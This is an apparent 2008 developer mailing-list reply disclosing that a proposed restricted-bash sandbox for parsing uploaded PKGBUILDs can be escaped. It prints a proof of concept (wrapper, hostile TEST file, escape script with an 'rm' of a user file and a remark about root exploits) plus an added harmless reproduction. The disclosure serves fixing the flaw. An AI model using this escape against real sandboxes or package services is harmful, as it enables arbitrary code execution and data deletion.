On Fri, Jun 20, 2008 at 12:54:29AM +0800, Callan Barrett wrote:
> Here's another iteration of this patch, I'm still looking for as much
> input as possible but this is basically what I would push to testing
> at this point. The script now outputs in a different format to be
> parsed and there is some cleanup done in pkgsubmit.php to get it
> working more cleanly with the script.
>

Unfortunately Callan and I found a way to easily defeat this tonight; the
proof-of-concept is attached. The attack is based on this little bit about
restricted shells (from the manpage):

---
When a command that is found to be a shell script is executed (see COMMAND
EXECUTION above), rbash turns off any restrictions in the shell spawned to
execute the script.
---
Too bad too, real bash parsing would have been nice :/

-S
The attached wrapper, which sources a PKGBUILD inside a restricted bash:

#!/bin/bash
ulimit -t 1
# an empty PATH makes bash resolve bare command names in the current directory
export PATH=''
exec /bin/bash --noprofile --norc --restricted << EOF
source TEST
[ -n "\$pkgname" ] && echo -e "%PKGNAME%\n\$pkgname\n"
EOF
TEST, the hostile PKGBUILD the wrapper sources:

pkgname=$(fucked.sh)
fucked.sh, the script TEST calls by bare name:

#!/bin/bash
# THIS SHOULD NOT WORK
/bin/ls -l /
/bin/rm /home/simo/foobar
# anything else could be executed here.... for instance a root exploit uploaded
# with the package
# this doesn't infinite loop because oddly enough ulimit still applies
# and cannot be changed
#while [ 0 -eq 0 ]; do
#    echo "you got fucked son"
#done
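A self-contained reproduction of the escape described in the mail, as an added example that is neither Simo's attachment nor part of Callan's patch. It rebuilds the same three pieces in a temporary directory (the restricted-shell wrapper, a hostile TEST file, and the script TEST calls by bare name) and reports whether that script ran outside the restrictions. For contrast, TEST also tries the same output redirection directly inside rbash, which the restricted shell refuses. It assumes only that bash is installed somewhere on PATH; the file names other than TEST, the marker files and the helper names are my own (hypothetical).

```shell
#!/bin/sh
# Added example, not code from the mail or the patch it discusses. Reproduces
# the rbash escape: a script invoked by bare name is found through the empty
# PATH (a null PATH means the current directory) and is executed by a fresh,
# unrestricted interpreter. Assumption: bash is installed on PATH.

BASH_BIN=$(command -v bash)   # located once, before any PATH='' takes effect

# Build the fixture directory and print its path.
make_fixture() {
    local dir
    dir=$(mktemp -d)

    # The wrapper, as in the attachment: CPU limit, empty PATH, then a
    # restricted bash fed its commands through a heredoc.
    cat > "$dir/wrapper.sh" <<'EOF'
#!/bin/sh
BASH_BIN=$(command -v bash)
ulimit -t 1
export PATH=''
exec "$BASH_BIN" --noprofile --norc --restricted << 'INNER'
source TEST
[ -n "$pkgname" ] && echo -e "%PKGNAME%\n$pkgname\n"
INNER
EOF

    # A hostile TEST (constructed). Line 1 attempts an output redirection
    # directly inside rbash, which a restricted shell refuses. Line 2 is the
    # attachment's trick: invoke a script by bare name via the empty PATH.
    cat > "$dir/TEST" <<'EOF'
pkgname=$(echo direct > direct.marker)
pkgname=$(escape.sh)
EOF

    # Stands in for fucked.sh (hypothetical name). The kernel runs it with an
    # unrestricted /bin/sh, so the redirection refused above succeeds here.
    cat > "$dir/escape.sh" <<'EOF'
#!/bin/sh
echo escaped > ./escaped.marker
EOF
    chmod +x "$dir/escape.sh"

    printf '%s\n' "$dir"
}

# Run the wrapper inside the fixture; print "escaped" if escape.sh executed
# outside the restricted shell, "contained" otherwise.
run_fixture() {
    ( cd "$1" && sh wrapper.sh >/dev/null 2>&1 ) || true
    if [ -f "$1/escaped.marker" ]; then echo escaped; else echo contained; fi
}

# After run_fixture: was the redirection attempted directly in rbash refused?
direct_redirect() {
    if [ -f "$1/direct.marker" ]; then echo allowed; else echo refused; fi
}

# Demo when run directly.
fixture=$(make_fixture)
echo "script called by bare name:    $(run_fixture "$fixture")"    # escaped
echo "redirection directly in rbash: $(direct_redirect "$fixture")" # refused
rm -rf "$fixture"
```

The two marker files are the whole check: rbash correctly refuses the redirection it is asked to perform itself, yet the same shell hands `escape.sh` to an unrestricted interpreter without complaint, exactly as the manpage excerpt says. Only the `ulimit -t 1` carries over, as the attachment's comments note, because it is a process limit rather than a shell restriction.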
